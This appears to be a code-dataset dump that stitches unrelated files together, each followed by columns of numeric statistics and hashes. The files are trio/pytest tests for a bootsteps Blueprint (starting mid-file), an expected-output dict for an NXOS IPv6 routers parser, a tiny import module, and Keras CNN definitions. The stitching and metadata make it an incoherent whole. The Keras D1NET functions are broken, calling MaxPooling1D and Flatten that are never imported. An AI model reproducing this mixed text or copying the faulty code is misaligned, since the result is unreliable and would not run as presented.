[m.mock_step3, m.mock_step4, m.mock_step5],
)
assert_log_message_field_equals(messages[2].message, "name", blueprint.name)
assert_log_message_field_equals(
messages[2].message, "next_bootsteps", [m.mock_step6]
)
logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:executing_bootstep")
assert len(logged_actions) == 6
start_messages = [logged_action.start_message for logged_action in logged_actions]
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step1)
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step2.start)
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step3)
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step4.start)
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step5)
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step6)
assert_logged_action_succeeded(logged_actions[0])
assert_logged_action_succeeded(logged_actions[1])
assert_logged_action_succeeded(logged_actions[2])
assert_logged_action_succeeded(logged_actions[3])
assert_logged_action_succeeded(logged_actions[4])
assert_logged_action_succeeded(logged_actions[5])
async def test_blueprint_start_failure(
bootsteps_graph, mock_execution_order_strategy_class, logger
):
mock_step1 = create_mock_step("step1")
mock_step1.side_effect = expected_exception = RuntimeError("Expected Failure")
mock_step2 = create_start_stop_mock_step("step2")
mock_step3 = create_mock_step("step3")
mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
mock_step5 = create_mock_step("step5")
mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
# We're using a parent mock simply to record the order of calls to different
# steps
m = Mock()
m.attach_mock(mock_step1, "mock_step1")
m.attach_mock(mock_step2, "mock_step2")
m.attach_mock(mock_step3, "mock_step3")
m.attach_mock(mock_step4, "mock_step4")
m.attach_mock(mock_step5, "mock_step5")
m.attach_mock(mock_step6, "mock_step6")
expected_execution_order = [
[m.mock_step1, m.mock_step2],
[m.mock_step3, m.mock_step4, m.mock_step5],
[m.mock_step6],
]
mock_iterator = MagicMock()
mock_iterator.__iter__.return_value = expected_execution_order
mock_execution_order_strategy_class.return_value = mock_iterator
blueprint = Blueprint(
bootsteps_graph,
name="Test",
execution_order_strategy_class=mock_execution_order_strategy_class,
)
with pytest.raises(RuntimeError):
async with trio.open_nursery() as nursery:
nursery.start_soon(blueprint.start)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.RUNNING
)
with trio.fail_after(1):
assert await blueprint.state_changes_receive_channel.receive() == (
BlueprintState.FAILED,
expected_exception,
)
mock_execution_order_strategy_class.assert_called_once_with(blueprint._steps)
assert_parallelized_steps_are_in_order(
m.method_calls, [[call.mock_step1(), call.mock_step2.start()]]
)
mock_step3.assert_not_called()
mock_step4.start.assert_not_called()
mock_step5.assert_not_called()
mock_step6.assert_not_called()
logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:start")
assert len(logged_actions) == 1
logged_action = logged_actions[0]
assert_log_message_field_equals(logged_action.start_message, "name", blueprint.name)
assert_logged_action_failed(logged_action)
messages = LoggedMessage.of_type(
logger.messages, "bootsteps:blueprint:next_bootsteps"
)
assert len(messages) == 1
assert_log_message_field_equals(messages[0].message, "name", blueprint.name)
assert_log_message_field_equals(
messages[0].message, "next_bootsteps", [m.mock_step1, m.mock_step2]
)
logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:executing_bootstep")
assert len(logged_actions) == 2
mock_step1.side_effect = None
assert_log_message_field_equals(logged_actions[0].start_message, "bootstep", m.mock_step1)
assert_logged_action_failed(logged_actions[0])
assert_log_message_field_equals(logged_actions[1].start_message, "bootstep", m.mock_step2.start)
assert_logged_action_succeeded(logged_actions[1])
async def test_blueprint_stop(
bootsteps_graph, mock_execution_order_strategy_class, logger
):
mock_step1 = create_mock_step("step1")
mock_step2 = create_start_stop_mock_step("step2")
mock_step3 = create_mock_step("step3")
mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
mock_step5 = create_mock_step("step5")
mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
# We're using a parent mock simply to record the order of calls to different
# steps
m = Mock()
m.attach_mock(mock_step1, "mock_step1")
m.attach_mock(mock_step2, "mock_step2")
m.attach_mock(mock_step3, "mock_step3")
m.attach_mock(mock_step4, "mock_step4")
m.attach_mock(mock_step5, "mock_step5")
m.attach_mock(mock_step6, "mock_step6")
expected_execution_order = [
[m.mock_step1, m.mock_step2],
[m.mock_step3, m.mock_step4, m.mock_step5],
[m.mock_step6],
]
mock_iterator = MagicMock()
reversed_func = Mock(return_value=reversed(expected_execution_order))
mock_iterator.__reversed__ = reversed_func
mock_iterator.__iter__.return_value = expected_execution_order
mock_execution_order_strategy_class.return_value = mock_iterator
blueprint = Blueprint(
bootsteps_graph,
name="Test",
execution_order_strategy_class=mock_execution_order_strategy_class,
)
async with trio.open_nursery() as nursery:
nursery.start_soon(blueprint.stop)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.TERMINATING
)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.TERMINATED
)
mock_execution_order_strategy_class.assert_called_once_with(blueprint._steps)
assert_parallelized_steps_are_in_order(
m.method_calls, [[call.mock_step4.stop()], [call.mock_step2.stop()]]
)
mock_step4.stop.assert_awaited_once_with()
mock_step1.assert_not_called()
mock_step3.assert_not_called()
mock_step5.assert_not_called()
mock_step6.assert_not_called()
logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:stop")
assert len(logged_actions) == 1
logged_action = logged_actions[0]
assert_log_message_field_equals(logged_action.start_message, "name", blueprint.name)
assert_logged_action_succeeded(logged_action)
messages = LoggedMessage.of_type(
logger.messages, "bootsteps:blueprint:next_bootsteps"
)
assert len(messages) == 2
assert_log_message_field_equals(messages[0].message, "name", blueprint.name)
assert_log_message_field_equals(
messages[0].message, "next_bootsteps", [m.mock_step4]
)
assert_log_message_field_equals(messages[1].message, "name", blueprint.name)
assert_log_message_field_equals(
messages[1].message,
"next_bootsteps",
[m.mock_step2],
)
logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:executing_bootstep")
assert len(logged_actions) == 2
start_messages = [logged_action.start_message for logged_action in logged_actions]
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step4.stop)
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step2.stop)
assert_logged_action_succeeded(logged_actions[0])
assert_logged_action_succeeded(logged_actions[1])
async def test_blueprint_stop_failure(
bootsteps_graph, mock_execution_order_strategy_class, logger
):
mock_step1 = create_mock_step("step1")
mock_step2 = create_start_stop_mock_step("step2")
mock_step3 = create_mock_step("step3")
mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
mock_step4.stop.side_effect = expected_exception = RuntimeError("Expected Failure")
mock_step5 = create_mock_step("step5")
mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
# We're using a parent mock simply to record the order of calls to different
# steps
m = Mock()
m.attach_mock(mock_step1, "mock_step1")
m.attach_mock(mock_step2, "mock_step2")
m.attach_mock(mock_step3, "mock_step3")
m.attach_mock(mock_step4, "mock_step4")
m.attach_mock(mock_step5, "mock_step5")
m.attach_mock(mock_step6, "mock_step6")
expected_execution_order = [
[m.mock_step1, m.mock_step2],
[m.mock_step3, m.mock_step4, m.mock_step5],
[m.mock_step6],
]
mock_iterator = MagicMock()
mock_iterator.__iter__.return_value = expected_execution_order
reversed_func = Mock(return_value=reversed(expected_execution_order))
mock_iterator.__reversed__ = reversed_func
mock_execution_order_strategy_class.return_value = mock_iterator
blueprint = Blueprint(
bootsteps_graph,
name="Test",
execution_order_strategy_class=mock_execution_order_strategy_class,
)
with pytest.raises(RuntimeError):
async with trio.open_nursery() as nursery:
nursery.start_soon(blueprint.stop)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.TERMINATING
)
with trio.fail_after(1):
assert await blueprint.state_changes_receive_channel.receive() == (
BlueprintState.FAILED,
expected_exception,
)
mock_execution_order_strategy_class.assert_called_once_with(blueprint._steps)
assert_parallelized_steps_are_in_order(m.method_calls, [[call.mock_step4.stop()]])
mock_step1.assert_not_called()
mock_step2.stop.assert_not_called()
mock_step3.assert_not_called()
mock_step5.assert_not_called()
mock_step6.assert_not_called()
logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:stop")
assert len(logged_actions) == 1
logged_action = logged_actions[0]
assert_log_message_field_equals(logged_action.start_message, "name", blueprint.name)
assert_logged_action_failed(logged_action)
messages = LoggedMessage.of_type(
logger.messages, "bootsteps:blueprint:next_bootsteps"
)
assert len(messages) == 1, messages
assert_log_message_field_equals(messages[0].message, "name", blueprint.name)
assert_log_message_field_equals(
messages[0].message, "next_bootsteps", [m.mock_step4]
)
logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:executing_bootstep")
assert len(logged_actions) == 1
start_messages = [logged_action.start_message for logged_action in logged_actions]
assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step4.stop)
assert_logged_action_failed(logged_actions[0])
async def test_blueprint_async_context_manager(
bootsteps_graph, mock_execution_order_strategy_class
):
mock_step1 = create_mock_step("step1")
mock_step2 = create_start_stop_mock_step("step2")
mock_step3 = create_mock_step("step3")
mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
mock_step5 = create_mock_step("step5")
mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
# We're using a parent mock simply to record the order of calls to different
# steps
m = Mock()
m.attach_mock(mock_step1, "mock_step1")
m.attach_mock(mock_step2, "mock_step2")
m.attach_mock(mock_step3, "mock_step3")
m.attach_mock(mock_step4, "mock_step4")
m.attach_mock(mock_step5, "mock_step5")
m.attach_mock(mock_step6, "mock_step6")
expected_execution_order = [
[m.mock_step1, m.mock_step2],
[m.mock_step3, m.mock_step4, m.mock_step5],
[m.mock_step6],
]
mock_iterator = MagicMock()
reversed_func = Mock(return_value=reversed(expected_execution_order))
mock_iterator.__reversed__ = reversed_func
mock_iterator.__iter__.return_value = expected_execution_order
mock_execution_order_strategy_class.return_value = mock_iterator
blueprint = Blueprint(
bootsteps_graph,
name="Test",
execution_order_strategy_class=mock_execution_order_strategy_class,
)
async with blueprint:
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.RUNNING
)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.COMPLETED
)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.TERMINATING
)
with trio.fail_after(1):
assert (
await blueprint.state_changes_receive_channel.receive()
== BlueprintState.TERMINATED
)
assert_parallelized_steps_are_in_order(
m.method_calls,
[
[call.mock_step1(), call.mock_step2.start()],
[call.mock_step3(), call.mock_step4.start(), call.mock_step5()],
[call.mock_step6()],
[call.mock_step4.stop()],
[call.mock_step2.stop()],
],
)
mock_step6.assert_awaited_once_with()
mock_step4.start.assert_awaited_once_with()
mock_step4.stop.assert_awaited_once_with()
| 36.220532
| 100
| 0.726433
| 2,384
| 19,052
| 5.382131
| 0.062919
| 0.022212
| 0.051438
| 0.063128
| 0.915283
| 0.90258
| 0.875068
| 0.855039
| 0.843192
| 0.833294
| 0
| 0.017305
| 0.184075
| 19,052
| 525
| 101
| 36.289524
| 0.808106
| 0.026139
| 0
| 0.721823
| 0
| 0
| 0.063589
| 0.022922
| 0
| 0
| 0
| 0
| 0.258993
| 1
| 0.009592
| false
| 0
| 0.021583
| 0.004796
| 0.035971
| 0.170264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfc97828ba5f7d7cac524f9a6edad1429c2ebf44
| 4,407
|
py
|
Python
|
src/genie/libs/parser/nxos/tests/ShowIpv6Routers/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpv6Routers/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/nxos/tests/ShowIpv6Routers/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
expected_output = {
"interfaces": {
"Ethernet1/3": {
"neighbors": {
"fe80::f816:3eff:feff:9f9b": {
"homeagent_flag": 0,
"is_router": True,
"addr_flag": 0,
"ip": "fe80::f816:3eff:feff:9f9b",
"lifetime": 1800,
"current_hop_limit": 64,
"retransmission_time": 0,
"last_update": "2.8",
"mtu": 1500,
"preference": "medium",
"other_flag": 0,
"reachable_time": 0,
"prefix": {
"2001:db8:c56d:1::/64": {
"preferred_lifetime": 604800,
"valid_lifetime": 2592000,
"autonomous_flag": 1,
"onlink_flag": 1,
}
}
}
},
"interface": "Ethernet1/3"
},
"Ethernet1/1": {
"neighbors": {
"fe80::f816:3eff:feff:e5a2": {
"homeagent_flag": 0,
"is_router": True,
"addr_flag": 0,
"ip": "fe80::f816:3eff:feff:e5a2",
"lifetime": 1800,
"current_hop_limit": 64,
"retransmission_time": 0,
"last_update": "3.2",
"mtu": 1500,
"preference": "medium",
"other_flag": 0,
"reachable_time": 0,
"prefix": {
"2001:db8:c56d:4::/64": {
"preferred_lifetime": 604800,
"valid_lifetime": 2592000,
"autonomous_flag": 1,
"onlink_flag": 1,
}
}
}
},
"interface": "Ethernet1/1"
},
"Ethernet1/4": {
"neighbors": {
"fe80::f816:3eff:feff:4908": {
"homeagent_flag": 0,
"is_router": True,
"addr_flag": 0,
"ip": "fe80::f816:3eff:feff:4908",
"lifetime": 1800,
"current_hop_limit": 64,
"retransmission_time": 0,
"last_update": "2.3",
"mtu": 1500,
"preference": "medium",
"other_flag": 0,
"reachable_time": 0,
"prefix": {
"2001:db8:c8d1:1::/64": {
"preferred_lifetime": 604800,
"autonomous_flag": 1,
"valid_lifetime": 2592000,
"onlink_flag": 1,
}
}
}
},
"interface": "Ethernet1/4"
},
"Ethernet1/2": {
"neighbors": {
"fe80::f816:3eff:feff:e455": {
"homeagent_flag": 0,
"is_router": True,
"addr_flag": 0,
"ip": "fe80::f816:3eff:feff:e455",
"lifetime": 1800,
"current_hop_limit": 64,
"retransmission_time": 0,
"last_update": "1.5",
"mtu": 1500,
"preference": "medium",
"other_flag": 0,
"reachable_time": 0,
"prefix": {
"2001:db8:c8d1:4::/64": {
"preferred_lifetime": 604800,
"onlink_flag": 1,
"valid_lifetime": 2592000,
"autonomous_flag": 1,
},
"2001:db8:888c:4::/64": {
"preferred_lifetime": 604800,
"onlink_flag": 1,
"valid_lifetime": 2592000,
"autonomous_flag": 1,
}
}
}
},
"interface": "Ethernet1/2"
}
}
}
| 36.421488
| 57
| 0.319492
| 288
| 4,407
| 4.690972
| 0.194444
| 0.044412
| 0.071058
| 0.094745
| 0.916358
| 0.757957
| 0.757957
| 0.757957
| 0.757957
| 0.757957
| 0
| 0.145304
| 0.562741
| 4,407
| 120
| 58
| 36.725
| 0.555786
| 0
| 0
| 0.576271
| 0
| 0
| 0.300568
| 0.045403
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c64328fbca10492a313313e0c42e36863e35caf
| 73
|
py
|
Python
|
dm_gym/utils/__init__.py
|
ashwin-M-D/DM-Gym
|
f468c175d16b09d88edc21d77b6755ca2d35fc13
|
[
"BSD-3-Clause"
] | null | null | null |
dm_gym/utils/__init__.py
|
ashwin-M-D/DM-Gym
|
f468c175d16b09d88edc21d77b6755ca2d35fc13
|
[
"BSD-3-Clause"
] | null | null | null |
dm_gym/utils/__init__.py
|
ashwin-M-D/DM-Gym
|
f468c175d16b09d88edc21d77b6755ca2d35fc13
|
[
"BSD-3-Clause"
] | null | null | null |
from dm_gym.utils.data_gen import *
from dm_gym.utils.livegraph import *
| 24.333333
| 36
| 0.808219
| 13
| 73
| 4.307692
| 0.615385
| 0.214286
| 0.321429
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 73
| 2
| 37
| 36.5
| 0.861538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
5ca5d7d628e05105b3d5c578b83330687b5d4823
| 11,472
|
py
|
Python
|
src/volumetric_src/network_training/networks.py
|
tjosc/Protein-Structure-Exploration
|
6b25affa1ccceb3ebf5d7236861bc0cbcd3d7ad8
|
[
"MIT"
] | null | null | null |
src/volumetric_src/network_training/networks.py
|
tjosc/Protein-Structure-Exploration
|
6b25affa1ccceb3ebf5d7236861bc0cbcd3d7ad8
|
[
"MIT"
] | null | null | null |
src/volumetric_src/network_training/networks.py
|
tjosc/Protein-Structure-Exploration
|
6b25affa1ccceb3ebf5d7236861bc0cbcd3d7ad8
|
[
"MIT"
] | 1
|
2019-04-04T19:06:15.000Z
|
2019-04-04T19:06:15.000Z
|
'''
networks.py
Updated: 12/29/17
README:
'''
# For Neural Network
from keras.models import Model
from keras.optimizers import Adam
from keras.metrics import categorical_accuracy
from keras.losses import categorical_crossentropy
from keras.layers.normalization import BatchNormalization
from keras.layers import Conv1D, GlobalMaxPooling1D, Dropout, Add, Dense, Input, Activation
from keras.layers import Conv2D, MaxPooling2D, Dropout, Input, Flatten, Dense, Concatenate
from keras.layers import Conv3D, AveragePooling2D, Activation, MaxPooling3D
from keras.optimizers import SGD, Adam, Adamax, Adadelta, RMSprop
from keras.constraints import maxnorm
################################################################################
def D1NET_v1(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 242,114
Parameters w/ 1 Chans: 228,810
'''
# Input Layer
x = Input(shape=(262144, nb_chans))
# Layers
l = Conv1D(filters=32, kernel_size=64, strides=9, padding='valid', activation='relu')(x)
l = MaxPooling1D(9)(l)
l = Conv1D(filters=32, kernel_size=64, strides=9, padding='valid', activation='relu')(l)
l = MaxPooling1D(9)(l)
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
# Output Layer
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D1NET_v2(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 310,978
Parameters w/ 1 Chans: 284,906
'''
# Input Layer
x = Input(shape=(262144, nb_chans))
# Layers
l = Conv1D(filters=32, kernel_size=121, strides=9, padding='valid', activation='relu')(x)
l = MaxPooling1D(9)(l)
l = Conv1D(filters=32, kernel_size=121, strides=9, padding='valid', activation='relu')(l)
l = MaxPooling1D(9)(l)
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
# Output Layer
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D1NET_v3(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 440,002
Parameters w/ 1 Chans: 390,634
'''
# Input Layer
x = Input(shape=(262144, nb_chans))
# Layers
l = Conv1D(filters=32, kernel_size=225, strides=9, padding='valid', activation='relu')(x)
l = MaxPooling1D(9)(l)
l = Conv1D(filters=32, kernel_size=225, strides=9, padding='valid', activation='relu')(l)
l = MaxPooling1D(9)(l)
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
# Output Layer
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D2NET_v1(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 184,770
Parameters w/ 1 Chans: 171,466
'''
x = Input(shape=(512, 512, nb_chans))
l = Conv2D(32, (8, 8), strides = (3,3), padding='valid', activation='relu')(x)
l = MaxPooling2D((3,3))(l)
l = Conv2D(32, (8, 8), strides = (3,3), padding='valid', activation='relu')(l)
l = MaxPooling2D((3,3))(l)
# Fully Connected Layer
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D2NET_v2(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 257,730
Parameters w/ 1 Chans: 231,658
'''
x = Input(shape=(512, 512, nb_chans))
l = Conv2D(32, (11, 11), strides = (3,3), padding='valid', activation='relu')(x)
l = MaxPooling2D((3,3))(l)
l = Conv2D(32, (11, 11), strides = (3,3), padding='valid', activation='relu')(l)
l = MaxPooling2D((3,3))(l)
# Fully Connected Layer
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D2NET_v3(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 353,986
Parameters w/ 1 Chans: 304,618
'''
x = Input(shape=(512, 512, nb_chans))
l = Conv2D(32, (15, 15), strides = (3,3), padding='valid', activation='relu')(x)
l = MaxPooling2D((3,3))(l)
l = Conv2D(32, (15, 15), strides = (3,3), padding='valid', activation='relu')(l)
l = MaxPooling2D((3,3))(l)
# Fully Connected Layer
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D2NET_v4(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:
Parameters w/ 1 Chans:
'''
x = Input(shape=(512, 512, nb_chans))
l = Conv2D(32, (8, 8), strides = (2,2), padding='valid', activation='relu')(x)
l = MaxPooling2D((2,2))(l)
l = Conv2D(32, (8, 8), strides = (2,2), padding='valid', activation='relu')(l)
l = MaxPooling2D((2,2))(l)
l = Conv2D(32, (8, 8), strides = (2,2), padding='valid', activation='relu')(l)
l = MaxPooling2D((2,2))(l)
# Fully Connected Layer
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D2NET_v5(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:
Parameters w/ 1 Chans:
'''
x = Input(shape=(512, 512, nb_chans))
l = Conv2D(32, (8, 8), strides = (2,2), padding='valid', activation='relu')(x)
l = MaxPooling2D((2,2))(l)
l = Conv2D(32, (8, 8), strides = (1,1), padding='valid', activation='relu')(l)
l = MaxPooling2D((2,2))(l)
l = Conv2D(32, (8, 8), strides = (1,1), padding='valid', activation='relu')(l)
l = MaxPooling2D((2,2))(l)
l = Conv2D(32, (8, 8), strides = (1,1), padding='valid', activation='relu')(l)
l = MaxPooling2D((2,2))(l)
# Fully Connected Layer
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def RESNET_v1(nb_chans, nb_class):
'''
Parameters w/ 8 Chans::
'''
from keras.layers import Add, Activation
x = Input(shape=(512, 512, nb_chans))
ll = Conv2D(32, (1, 1), strides = (1,1), padding='same')(x)
l0 = Conv2D(32, (8, 8), strides = (1,1), padding='same', activation='relu')(ll)
l1 = Conv2D(32, (8, 8), strides = (1,1), padding='same')(l0)
l2 = Add()([ll, l1])
l3 = Activation('relu')(l2)
l4 = MaxPooling2D((9,9))(l3)
l5 = Conv2D(32, (8 ,8), strides = (1,1), padding='same', activation='relu')(l4)
l6 = Conv2D(32, (8, 8), strides = (1,1), padding='same')(l5)
l7 = Add()([l4,l6])
l8 = Activation('relu')(l7)
l9 = MaxPooling2D((9,9))(l8)
# Fully Connected Layer
l = Flatten()(l9)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D3NET_v1(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 192,962
Parameters w/ 1 Chans: 179,658
'''
x = Input(shape=(64, 64, 64, nb_chans))
l = Conv3D(32, (4, 4, 4), strides=(2, 2, 2), activation='relu', padding='valid')(x)
l = MaxPooling3D(pool_size=(2, 2, 2))(l)
l = Conv3D(32, (4, 4, 4), strides=(2, 2, 2), activation='relu', padding='valid')(l)
l = MaxPooling3D(pool_size=(2, 2, 2))(l)
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D3NET_v2(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 271,042
Parameters w/ 1 Chans: 244,074
'''
x = Input(shape=(64, 64, 64, nb_chans))
l = Conv3D(32, (5, 5, 5), strides=(2, 2, 2), activation='relu', padding='valid')(x)
l = MaxPooling3D(pool_size=(2, 2, 2))(l)
l = Conv3D(32, (5, 5, 5), strides=(2, 2, 2), activation='relu', padding='valid')(l)
l = MaxPooling3D(pool_size=(2, 2, 2))(l)
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D3NET_v3(nb_chans, nb_class):
'''
Parameters w/ 8 Chans:: 309,698
Parameters w/ 1 Chans: 262,346
'''
x = Input(shape=(64, 64, 64, nb_chans))
l = Conv3D(32, (6, 6, 6), strides=(2, 2, 2), activation='relu', padding='valid')(x)
l = MaxPooling3D(pool_size=(2, 2, 2))(l)
l = Conv3D(32, (6, 6, 6), strides=(2, 2, 2), activation='relu', padding='valid')(l)
l = MaxPooling3D(pool_size=(2, 2, 2))(l)
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(nb_class, activation='softmax')(l)
model = Model(inputs=x, outputs=y)
loss = categorical_crossentropy
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = [categorical_accuracy,]
return model, loss, optimizer, metrics
def D2NETREG_v1(nb_chans):
'''
'''
from keras.losses import mean_squared_error
x = Input(shape=(512, 512, nb_chans))
l = Conv2D(32, (8, 8), strides = (3,3), padding='valid', activation='relu')(x)
l = MaxPooling2D((3,3))(l)
l = Conv2D(32, (8, 8), strides = (3,3), padding='valid', activation='relu')(l)
l = MaxPooling2D((3,3))(l)
# Fully Connected Layer
l = Flatten()(l)
l = Dense(128, activation='relu')(l)
l = Dropout(0.5)(l)
y = Dense(1, activation='sigmoid')(l)
model = Model(inputs=x, outputs=y)
loss = mean_squared_error
optimizer = Adam(lr=0.0001,decay=0.1e-6)
metrics = ['accuracy',]
return model, loss, optimizer, metrics
| 31.005405
| 93
| 0.613319
| 1,683
| 11,472
| 4.114676
| 0.095663
| 0.017617
| 0.054152
| 0.057762
| 0.847076
| 0.840289
| 0.834657
| 0.831191
| 0.826859
| 0.770542
| 0
| 0.087671
| 0.204585
| 11,472
| 369
| 94
